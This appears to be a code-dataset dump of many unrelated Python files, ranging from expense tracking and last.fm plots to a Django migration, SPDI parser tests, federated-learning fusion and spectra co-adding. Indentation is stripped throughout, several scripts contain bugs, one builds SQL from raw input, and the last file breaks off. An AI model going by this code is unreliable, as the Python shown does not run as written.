ret_df.Timestamp = ynab_df_filter.timestamp.astype(str) + ' 00:00:00'
ret_df.Payee = 'Ryder'
ret_df.Amount = ynab_df_filter.amount.round(0).astype(int).astype(str)
# apply for us for red flags, and for you for purple flags
ret_df.Purpose = (ynab_df_filter.flag.apply(lambda x:
'for us' if x == 'red' else 'for you' if x == 'purple' else '-1'))
ret_df.Description = (
(ynab_df_filter.payee + ' - ' + ynab_df_filter.memo)
.str.replace(' - None', '')
)
return(ret_df)
def get_expenses_from_google(sh=sh, since_date='1900-01-01'):
colnames = ['Timestamp', 'Payee', 'Amount', 'Purpose', 'Description']
all_sheets = pd.DataFrame(columns = colnames)
for sheetnum in range(len(sh.worksheets())):
curr_sheet = load_and_process_sheet(sh, sheetnum)
sheet_title = re.search(r'(?<=Worksheet ).+(?= index)',
str(sh.worksheets()[1])).group(0)
if curr_sheet.shape[1] != 5:
raise Exception(f'Worksheet {sheet_title} (index {sheetnum} has the '
f'wrong dimensions.')
# print(curr_sheet.columns)
all_sheets = all_sheets.append(curr_sheet)
since_date_datetime = datetime.datetime.strptime(since_date, '%Y-%m-%d')
ret_expenses_from_google = (
all_sheets
.loc[all_sheets.Timestamp >= since_date_datetime]
.sort_values('Timestamp', ascending = False)
)
ret_expenses_from_google.Timestamp = (
ret_expenses_from_google.Timestamp.astype(str)
)
return(ret_expenses_from_google)
#%%
def get_new_ynab_expenses_to_upload():
# Get most recent date from Google expenses
since_date=get_last_trns_date(format='string')
# Get most recent Google shared expenses
recent_from_gs = get_expenses_from_google(since_date=since_date)
# Get my recent YNAB expenses
recent_from_ynab = get_trans_from_ynab(since_date=since_date)
# Set operation: return only those YNAB expenses NOT also in Google sheets
in_ynab_not_google = (
recent_from_ynab.merge(recent_from_gs, how = 'left', indicator = True)
.query('_merge == \'left_only\'')
.drop('_merge', 1)
)
return(in_ynab_not_google)
#%%
def append_to_expenses_sheet(expenses_to_upload):
print('')
print(expenses_to_upload)
print('')
this_month = sh.worksheet('index', 0)
while True:
decision = input('Upload to Expenses Tracker? y/n >> ')
if decision[0].lower() == 'y':
print('')
for index, row in expenses_to_upload.iterrows():
row_list = [row.Timestamp, row.Payee, row.Amount,
row.Purpose, row.Description]
this_month.append_table(row_list)
print(f'Appending ${float(row.Amount):.0f} - {row.Description} to tracker.')
print(f'\nUploaded ${expenses_to_upload.Amount.astype(float).sum():.0f} ' \
f'over {expenses_to_upload.shape[0]} transactions.')
break
elif decision[0].lower() == 'n':
print('Not entering.')
break
else:
print(f'Did not understand entry ({decision}). Try again.')
def archive_sheet_and_clear(sheet=sh):
w = load_and_process_sheet(sh, tab=0)
date_max = w.Timestamp.max().strftime('%m/%d/%Y')
date_min = w.Timestamp.min().strftime('%m/%d')
tab_title = date_min + '-' + date_max
wks = sh.worksheet('index', 0)
sh.add_worksheet(tab_title, src_worksheet=wks)
wks.clear(start='A3')
def show_spender_information(sheet=sh):
w_df = load_and_process_sheet(sheet, tab=0)
spender_list = w_df.Payee.unique()
amounts_list = []
for i, name in enumerate(spender_list):
total_shared_transactions_amt = w_df[w_df.Purpose == 'for us'].sum()
spenders_shared_transactions_amt = (
w_df[(w_df.Payee == name) & w_df.Purpose == 'for us']
)
print(total_shared_transactions_amt)
|
nilq/baby-python
|
python
|
name = 'omnifig'
long_name = 'omni-fig'
version = '0.6.3'
url = 'https://github.com/felixludos/omni-fig'
description = 'Universal configuration system for common execution environments'
author = 'Felix Leeb'
author_email = 'felixludos.info@gmail.com'
license = 'MIT'
readme = 'README.rst'
packages = ['omnifig']
import os
try:
with open(os.path.join(os.path.abspath(os.path.dirname(os.path.dirname(__file__))), 'requirements.txt'), 'r') as f:
install_requires = f.readlines()
except:
install_requires = ['pyyaml', 'C3Linearize', 'omnibelt']
del os
entry_points = {'console_scripts': 'fig = omnifig.top:entry'}
|
nilq/baby-python
|
python
|
import sys
import dataset
from datetime import datetime
from dateutil.rrule import rrule, MONTHLY
from dateutil.relativedelta import relativedelta
def process(username, metric, stream_limit):
# gets all artists and their respective daily play counts
db = dataset.connect('sqlite:///last-fm.db')
total = db[username].count()
timeframe = db.query('SELECT MIN(timestamp), MAX(timestamp) FROM %s' % username).next()
mintime = datetime.fromtimestamp(timeframe['MIN(timestamp)'])
maxtime = datetime.fromtimestamp(timeframe['MAX(timestamp)'])
timeframe = len([dt for dt in rrule(MONTHLY, dtstart=mintime, until=maxtime)])
sql = 'SELECT DISTINCT {0} FROM {1} GROUP BY {0}, play_year, play_month HAVING count({0}) > {2}'.format(metric, username, stream_limit)
result = db.query(sql)
artists = []
for row in result:
artists.append(row[metric])
artists = '(%s)' % str(artists)[1:-1]
sql = 'SELECT {0}, timestamp, count({0}) FROM {1} GROUP BY {0}, play_year, play_month HAVING {0} IN {2}'.format(metric, username, artists)
result = db.query(sql)
streams = {}
for row in result:
artist = row[metric]
if artist not in streams:
streams[artist] = [0 for i in range(timeframe)]
current = datetime.fromtimestamp(int(row['timestamp']))
elapsed = len([dt for dt in rrule(MONTHLY, dtstart=mintime, until=current)])
if streams[artist][elapsed - 1] == 0:
streams[artist][elapsed - 1] = row['count(%s)' % metric]
else:
streams[artist][elapsed] = row['count(%s)' % metric]
if len(sys.argv) > 2 and sys.argv[2] == '--other':
sql = 'SELECT COUNT(*) AS count, timestamp FROM {0} WHERE {1} NOT IN {2} GROUP BY play_year, play_month'.format(username, metric, artists)
result = db.query(sql)
streams['other'] = [0 for i in range(timeframe)]
for row in result:
current = datetime.fromtimestamp(int(row['timestamp']))
elapsed = len([dt for dt in rrule(MONTHLY, dtstart=mintime, until=current)])
if streams['other'][elapsed - 1] == 0:
streams['other'][elapsed - 1] = row['count']
elif elapsed != len(streams):
streams['other'][elapsed] = row['count']
with open('scrobble-streamgraph/stream-data.csv', 'w') as csv:
csv.write('key,value,date\n')
for i in range(timeframe):
current = mintime + relativedelta(months=i)
for artist in streams:
try:
csv.write('%s,%s,%s\n' % (artist.replace(',', ''), streams[artist][i], '%s/01/%s' % (current.month, str(current.year)[2:])))
except UnicodeEncodeError:
pass
if __name__ == '__main__':
try:
user = sys.argv[1]
except IndexError:
print("[ERROR] No last.fm username specified.")
quit()
try:
stream_limit = sys.argv[2]
except IndexError:
print("[ERROR] No scrobble minimum specified.")
quit()
try:
int(stream_limit)
except ValueError:
print("[ERROR] Scrobble minimum must be an integer.")
quit()
metric = 'artist'
processor.process(user, metric, stream_limit)
|
nilq/baby-python
|
python
|
import requests
from datetime import datetime
aq = []
def scrap():
url = "http://vc8006.pythonanywhere.com/api/"
response = requests.request("GET", url)
r = response.json()
for i in range(1,31):
aq.append(r[-i]['AQI'])
# print(r[-i])
# print(response.text)
print(aq)
scrap()
|
nilq/baby-python
|
python
|
import gym
from griddly import GymWrapperFactory
from griddly.RenderTools import RenderToFile
if __name__ == '__main__':
# A nice tool to save png images
file_renderer = RenderToFile()
# This is what to use if you want to use OpenAI gym environments
wrapper = GymWrapperFactory()
# There are two levels here
level = 0
wrapper.build_gym_from_yaml('GameOfLife', 'game-of-life.yaml', level=level)
# Create the Environment
env = gym.make(f'GDY-GameOfLife-v0')
observation = env.reset()
file_renderer.render(observation, f'sokoban-level-{level}.png')
|
nilq/baby-python
|
python
|
# Generated by Django 2.2.15 on 2020-08-04 19:14
import aldryn_apphooks_config.fields
import app_data.fields
import cms.models.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import djangocms_blog.models
import djangocms_text_ckeditor.fields
import filer.fields.image
import parler.fields
import parler.models
import sortedm2m.fields
import taggit_autosuggest.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('taggit', '0003_taggeditem_add_unique_index'),
('filer', '0011_auto_20190418_0137'),
('sites', '0002_alter_domain_unique'),
migrations.swappable_dependency(settings.FILER_IMAGE_MODEL),
('cms', '0022_auto_20180620_1551'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='BlogCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateTimeField(auto_now_add=True, verbose_name='created at')),
('date_modified', models.DateTimeField(auto_now=True, verbose_name='modified at')),
],
options={
'verbose_name': 'blog category',
'verbose_name_plural': 'blog categories',
},
bases=(djangocms_blog.models.BlogMetaMixin, parler.models.TranslatableModelMixin, models.Model),
),
migrations.CreateModel(
name='BlogConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(max_length=100, verbose_name='Type')),
('namespace', models.CharField(default=None, max_length=100, unique=True, verbose_name='Instance namespace')),
('app_data', app_data.fields.AppDataField(default='{}', editable=False)),
],
options={
'verbose_name': 'blog config',
'verbose_name_plural': 'blog configs',
},
bases=(parler.models.TranslatableModelMixin, models.Model),
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateTimeField(auto_now_add=True, verbose_name='created')),
('date_modified', models.DateTimeField(auto_now=True, verbose_name='last modified')),
('date_published', models.DateTimeField(blank=True, null=True, verbose_name='published since')),
('date_published_end', models.DateTimeField(blank=True, null=True, verbose_name='published until')),
('date_featured', models.DateTimeField(blank=True, null=True, verbose_name='featured date')),
('publish', models.BooleanField(default=False, verbose_name='publish')),
('enable_comments', models.BooleanField(default=True, verbose_name='enable comments on post')),
('enable_liveblog', models.BooleanField(default=False, verbose_name='enable liveblog on post')),
('amount', models.CharField(choices=[('R50', 'R50'), ('R100', 'R100'), ('R150', 'R150'), ('R200', 'R200')], default='R50', max_length=200)),
('goal', models.CharField(choices=[('R30 000', 'R30 000'), ('R50 000', 'R50 000'), ('R100 000', 'R100 000'), ('R200 000', 'R200 000')], default='R30 000', max_length=200)),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
('author', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='djangocms_blog_post_author', to=settings.AUTH_USER_MODEL, verbose_name='author')),
('categories', models.ManyToManyField(blank=True, related_name='blog_posts', to='djangocms_blog.BlogCategory', verbose_name='category')),
('content', cms.models.fields.PlaceholderField(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='post_content', slotname='post_content', to='cms.Placeholder')),
('liveblog', cms.models.fields.PlaceholderField(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='live_blog', slotname='live_blog', to='cms.Placeholder')),
('main_image', filer.fields.image.FilerImageField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='djangocms_blog_post_image', to=settings.FILER_IMAGE_MODEL, verbose_name='main image')),
('main_image_full', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='djangocms_blog_post_full', to='filer.ThumbnailOption', verbose_name='main image full')),
('main_image_thumbnail', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='djangocms_blog_post_thumbnail', to='filer.ThumbnailOption', verbose_name='main image thumbnail')),
('media', cms.models.fields.PlaceholderField(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='media', slotname='media', to='cms.Placeholder')),
('related', sortedm2m.fields.SortedManyToManyField(blank=True, help_text=None, to='djangocms_blog.Post', verbose_name='Related Posts')),
('sites', models.ManyToManyField(blank=True, help_text='Select sites in which to show the post. If none is set it will be visible in all the configured sites.', to='sites.Site', verbose_name='Site(s)')),
('tags', taggit_autosuggest.managers.TaggableManager(blank=True, help_text='A comma-separated list of tags.', related_name='djangocms_blog_tags', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags')),
],
options={
'verbose_name': 'blog article',
'verbose_name_plural': 'blog articles',
'ordering': ('-date_published', '-date_created'),
'get_latest_by': 'date_published',
},
bases=(djangocms_blog.models.KnockerModel, djangocms_blog.models.BlogMetaMixin, parler.models.TranslatableModelMixin, models.Model),
),
migrations.CreateModel(
name='LatestPostsPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_blog_latestpostsplugin', serialize=False, to='cms.CMSPlugin')),
('current_site', models.BooleanField(default=True, help_text='Select items from the current site only', verbose_name='current site')),
('template_folder', models.CharField(choices=[('plugins', 'Default template')], default='plugins', help_text='Select plugin template to load for this instance', max_length=200, verbose_name='Plugin template')),
('latest_posts', models.IntegerField(default=5, help_text='The number of latests articles to be displayed.', verbose_name='articles')),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(blank=True, help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
('categories', models.ManyToManyField(blank=True, help_text='Show only the blog articles tagged with chosen categories.', to='djangocms_blog.BlogCategory', verbose_name='filter by category')),
('tags', taggit_autosuggest.managers.TaggableManager(blank=True, help_text='Show only the blog articles tagged with chosen tags.', related_name='djangocms_blog_latest_post', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='filter by tag')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='GenericBlogPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_blog_genericblogplugin', serialize=False, to='cms.CMSPlugin')),
('current_site', models.BooleanField(default=True, help_text='Select items from the current site only', verbose_name='current site')),
('template_folder', models.CharField(choices=[('plugins', 'Default template')], default='plugins', help_text='Select plugin template to load for this instance', max_length=200, verbose_name='Plugin template')),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(blank=True, help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.AddField(
model_name='blogcategory',
name='app_config',
field=aldryn_apphooks_config.fields.AppHookConfigField(help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config'),
),
migrations.AddField(
model_name='blogcategory',
name='parent',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='djangocms_blog.BlogCategory', verbose_name='parent'),
),
migrations.CreateModel(
name='AuthorEntriesPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_blog_authorentriesplugin', serialize=False, to='cms.CMSPlugin')),
('current_site', models.BooleanField(default=True, help_text='Select items from the current site only', verbose_name='current site')),
('template_folder', models.CharField(choices=[('plugins', 'Default template')], default='plugins', help_text='Select plugin template to load for this instance', max_length=200, verbose_name='Plugin template')),
('latest_posts', models.IntegerField(default=5, help_text='The number of author articles to be displayed.', verbose_name='articles')),
('app_config', aldryn_apphooks_config.fields.AppHookConfigField(blank=True, help_text='When selecting a value, the form is reloaded to get the updated default', null=True, on_delete=django.db.models.deletion.CASCADE, to='djangocms_blog.BlogConfig', verbose_name='app. config')),
('authors', models.ManyToManyField(limit_choices_to={'djangocms_blog_post_author__publish': True}, to=settings.AUTH_USER_MODEL, verbose_name='authors')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='PostTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language_code', models.CharField(db_index=True, max_length=15, verbose_name='Language')),
('title', models.CharField(max_length=752, verbose_name='title')),
('slug', models.SlugField(allow_unicode=True, blank=True, max_length=752, verbose_name='slug')),
('subtitle', models.CharField(blank=True, default='', max_length=767, verbose_name='subtitle')),
('abstract', djangocms_text_ckeditor.fields.HTMLField(blank=True, default='', verbose_name='abstract')),
('meta_description', models.TextField(blank=True, default='', verbose_name='post meta description')),
('meta_keywords', models.TextField(blank=True, default='', verbose_name='post meta keywords')),
('meta_title', models.CharField(blank=True, default='', help_text='used in title tag and social sharing', max_length=2000, verbose_name='post meta title')),
('post_text', djangocms_text_ckeditor.fields.HTMLField(blank=True, default='', verbose_name='text')),
('master', parler.fields.TranslationsForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='djangocms_blog.Post')),
],
options={
'verbose_name': 'blog article Translation',
'db_table': 'djangocms_blog_post_translation',
'db_tablespace': '',
'managed': True,
'default_permissions': (),
'unique_together': {('language_code', 'master'), ('language_code', 'slug')},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
),
migrations.CreateModel(
name='BlogConfigTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language_code', models.CharField(db_index=True, max_length=15, verbose_name='Language')),
('app_title', models.CharField(max_length=234, verbose_name='application title')),
('object_name', models.CharField(default='Article', max_length=234, verbose_name='object name')),
('master', parler.fields.TranslationsForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='djangocms_blog.BlogConfig')),
],
options={
'verbose_name': 'blog config Translation',
'db_table': 'djangocms_blog_blogconfig_translation',
'db_tablespace': '',
'managed': True,
'default_permissions': (),
'unique_together': {('language_code', 'master')},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
),
migrations.CreateModel(
name='BlogCategoryTranslation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language_code', models.CharField(db_index=True, max_length=15, verbose_name='Language')),
('name', models.CharField(max_length=752, verbose_name='name')),
('slug', models.SlugField(blank=True, max_length=752, verbose_name='slug')),
('meta_description', models.TextField(blank=True, default='', verbose_name='category meta description')),
('master', parler.fields.TranslationsForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translations', to='djangocms_blog.BlogCategory')),
],
options={
'verbose_name': 'blog category Translation',
'db_table': 'djangocms_blog_blogcategory_translation',
'db_tablespace': '',
'managed': True,
'default_permissions': (),
'unique_together': {('language_code', 'master'), ('language_code', 'slug')},
},
bases=(parler.models.TranslatedFieldsModelMixin, models.Model),
),
]
|
nilq/baby-python
|
python
|
import pandas as pd
import numpy as np
import ml_metrics as metrics
from sklearn.ensemble import RandomForestClassifier
from sklearn.calibration import CalibratedClassifierCV
from sklearn.cross_validation import StratifiedKFold
from sklearn.metrics import log_loss
path = '../Data/'
print("read training data")
train = pd.read_csv(path+"train_tfidf.csv")
label = train['target']
trainID = train['id']
del train['id']
del train['target']
tsne = pd.read_csv(path+'tfidf_train_tsne.csv')
train = train.join(tsne)
clf = RandomForestClassifier(n_jobs=-1, n_estimators=300, verbose=3, random_state=131)
iso_clf = CalibratedClassifierCV(clf, method='isotonic', cv=10)
iso_clf.fit(train.values, label)
print("read test data")
test = pd.read_csv(path+"test_tfidf.csv")
ID = test['id']
del test['id']
tsne = pd.read_csv(path+'tfidf_test_tsne.csv')
test = test.join(tsne)
clf_probs = iso_clf.predict_proba(test.values)
sample = pd.read_csv(path+'sampleSubmission.csv')
print("writing submission data")
submission = pd.DataFrame(clf_probs, index=ID, columns=sample.columns[1:])
submission.to_csv(path+"rf_tfidf.csv",index_label='id')
# retrain
sample = pd.read_csv(path+'sampleSubmission.csv')
submission = pd.DataFrame(index=trainID, columns=sample.columns[1:])
nfold=5
skf = StratifiedKFold(label, nfold, random_state=131)
score = np.zeros(nfold)
i=0
for tr, te in skf:
X_train, X_test, y_train, y_test = train.values[tr], train.values[te], label[tr], label[te]
clf = RandomForestClassifier(n_jobs=-1, n_estimators=300, verbose=3, random_state=131)
iso_clf = CalibratedClassifierCV(clf, method='isotonic', cv=10)
iso_clf.fit(X_train, y_train)
pred = iso_clf.predict_proba(X_test)
tmp = pd.DataFrame(pred, columns=sample.columns[1:])
submission.iloc[te] = pred
score[i]= log_loss(y_test,pred,eps=1e-15, normalize=True)
print((score[i]))
i+=1
print(("ave: "+ str(np.average(score)) + "stddev: " + str(np.std(score))))
# cv 10, 0.475277 + 0.00974157
# nfold 5: 0.48047625 + 0.0114040
# nfold 3: 0.4870385 + 0.0059006
print((log_loss(label,submission.values,eps=1e-15, normalize=True)))
submission.to_csv(path+"rf_tfidf_retrain.csv",index_label='id')
|
nilq/baby-python
|
python
|
import pytest
from mutalyzer_spdi_parser.convert import to_hgvs_internal_model, to_spdi_model
TESTS_SET = [
(
"NG_012337.3:10:C:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_sequence": "C",
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"deleted": [{"sequence": "C", "source": "description"}],
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:1:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 1,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10::T",
{
"seq_id": "NG_012337.3",
"position": 10,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 10},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:0:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 0,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 10},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:CT:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_sequence": "CT",
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
"deleted": [{"sequence": "CT", "source": "description"}],
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:2:T",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 2,
"inserted_sequence": "T",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
"inserted": [{"sequence": "T", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10:2:",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_length": 2,
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
}
],
},
),
(
"NG_012337.3:10:CT:",
{
"seq_id": "NG_012337.3",
"position": 10,
"deleted_sequence": "CT",
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 12},
},
"deleted": [{"sequence": "CT", "source": "description"}],
}
],
},
),
(
"NG_012337.3:10::",
{
"seq_id": "NG_012337.3",
"position": 10,
},
{
"type": "description_dna",
"reference": {"id": "NG_012337.3"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"inserted": [
{
"location": {
"type": "range",
"start": {"type": "point", "position": 10},
"end": {"type": "point", "position": 11},
},
"source": "reference",
}
],
}
],
},
),
(
"NP_003997.1:1:M:RSTV",
{
"seq_id": "NP_003997.1",
"position": 1,
"deleted_sequence": "M",
"inserted_sequence": "RSTV",
},
{
"type": "description_dna",
"reference": {"id": "NP_003997.1"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 1},
"end": {"type": "point", "position": 2},
},
"deleted": [{"sequence": "M", "source": "description"}],
"inserted": [{"sequence": "RSTV", "source": "description"}],
}
],
},
),
(
"NM_003002.2:273:g:u",
{
"seq_id": "NM_003002.2",
"position": 273,
"deleted_sequence": "g",
"inserted_sequence": "u",
},
{
"type": "description_dna",
"reference": {"id": "NM_003002.2"},
"variants": [
{
"type": "deletion_insertion",
"location": {
"type": "range",
"start": {"type": "point", "position": 273},
"end": {"type": "point", "position": 274},
},
"deleted": [{"sequence": "g", "source": "description"}],
"inserted": [{"sequence": "u", "source": "description"}],
}
],
},
),
]
@pytest.mark.parametrize(
"description, model",
[(t[0], t[1]) for t in TESTS_SET],
)
def test_to_spdi_model(description, model):
assert to_spdi_model(description) == model
@pytest.mark.parametrize(
"description, model",
[(t[0], t[2]) for t in TESTS_SET],
)
def test_to_hgvs_internal_model(description, model):
assert to_hgvs_internal_model(description) == model
|
nilq/baby-python
|
python
|
"""
Licensed Materials - Property of IBM
Restricted Materials of IBM
20190891
© Copyright IBM Corp. 2021 All Rights Reserved.
"""
"""
Module to where fusion algorithms are implemented.
"""
import logging
import numpy as np
from ibmfl.aggregator.fusion.iter_avg_fusion_handler import \
IterAvgFusionHandler
logger = logging.getLogger(__name__)
class RLFusionHandler(IterAvgFusionHandler):
"""
Class for weight based Federated Averaging aggregation.
In this class, the simple averaging aggregation is performed over the RL
policy model weights.
"""
def __init__(self, hyperparams, protocol_handler,
fl_model=None,
data_handler=None,
**kwargs):
super().__init__(hyperparams,
protocol_handler,
data_handler,
fl_model,
**kwargs)
self.name = "RLAvgFusion"
def fusion_collected_responses(self, lst_model_updates):
"""
Receives a list of model updates, where a model update is of the type
`ModelUpdate`, using the weights included in each model_update, it
finds the mean of weights per layer (indicating by key)
:param lst_model_updates: List of model updates of type `ModelUpdate` \
to be averaged.
:type lst_model_updates: `lIst`
:return: results after aggregation
:rtype: `dict`
"""
weights = dict()
# Key list gives layers of the neural network
weights_key_list = list(lst_model_updates[0].get('weights').keys())
# Iterate through the layers of neutral network
for key in weights_key_list:
w = []
for update in lst_model_updates:
w.append(np.array(update.get('weights').get(key)))
avg_weight = np.mean(np.array(w), axis=0)
weights[key] = avg_weight
return weights
|
nilq/baby-python
|
python
|
from lark import Tree
from copy import deepcopy
from .values import Value, ValueType
from .symbols import Symbol, Symbols
from .debug import DebugOutput
from .converters import get_symbol_name_from_key_item, get_array_index_exp_token_from_key_item
from . import blocks
from . import expressions
class Key():
def __init__(self, token: Tree, current_block):
self.key_items = []
for key_item in token.children:
symbol_name = get_symbol_name_from_key_item(key_item)
array_index_exp_token = get_array_index_exp_token_from_key_item(
key_item)
if array_index_exp_token:
array_index_exp = expressions.Expression(
array_index_exp_token, current_block)
else:
array_index_exp = None
key_item = {
"symbol_name": symbol_name,
"array_index_exp": array_index_exp,
}
self.key_items.append(key_item)
self.current_block = current_block
def get_value(self) -> Value:
value = self.__search_recursively()
return deepcopy(value)
def set_value(self, value: Value):
key_value = self.__search_recursively()
key_value.assign_value(value)
def set_value_in_python(self, value_in_python):
value = self.__search_recursively()
value.assign_value_in_python(value_in_python)
def __search_recursively(self) -> Value:
# Do one level only here
# Fixme
value = None
block = self.current_block
for key_item in self.key_items:
symbol_name = key_item['symbol_name']
array_index_exp = key_item['array_index_exp']
symbol = block.search_symbol_by_name_recursively(symbol_name)
if not symbol:
return None
if array_index_exp:
value = symbol.value.value_in_python[int(array_index_exp.get_value().value_in_python)]
else:
value = symbol.value
if not isinstance(value.value_type, blocks.TypeBlock):
break
else:
block = value.value_in_python
return value
def debug_output(self):
DebugOutput.output_block_attr("key")
DebugOutput.increase_depth()
DebugOutput.output(self.key_items)
DebugOutput.decrease_depth()
|
nilq/baby-python
|
python
|
numero=int(input('Coloque o seu numero: '))
x=0
while x <= numero:
if x % 2 == 0:
print (x)
x = x + 1
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""Package to support metabarcoding read trimmming, merging, and quantitation."""
import os
__version__ = "0.1.0-alpha"
_ROOT = os.path.abspath(os.path.dirname(__file__))
ADAPTER_PATH = os.path.join(_ROOT, "data", "TruSeq3-PE.fa")
|
nilq/baby-python
|
python
|
import numpy as np
import pylab as pl
from astropy.io import fits
from astropy.table import Table
from linetools.spectra.io import readspec
from linetools.spectra.xspectrum1d import XSpectrum1D
from linetools.spectra.utils import collate
import numpy as np
from pypeit.core import coadd as arco
from astropy import units as u
"""Main module for co-addition of 1-d spectra"""
def coadd_stis_from_x1dfiles_old(filenames, wv_array=None, rebin=None, debug=False):
"""
Parameters
----------
filenames : list
List of filenames with x1d STIS data
Must be of the same object and same
configuration
wv_array : Quantity array
Wavelength array to perform the co-add
rebin : int, optional
If given, it rebins the current sampling by
rebin number of pixels
Returns
-------
spec1d : XSpectrum1D
Co-added version of all the spectra
"""
spec_list = []
for filename in filenames:
aux = load_single_x1d_stis(filename, debug=debug)
for sp in aux:
spec_list += [sp]
# spec_list contains all echelle orders from different files and multi-extensions
specs = collate(spec_list) # now all in a single XSpectrum1D object
if wv_array is None:
# bring them to a unique native wavelength grid using PYPIT
cat_wave = arco.new_wave_grid(specs.data['wave'], wave_method='velocity')
else:
cat_wave = wv_array.to('AA').value
if rebin is not None:
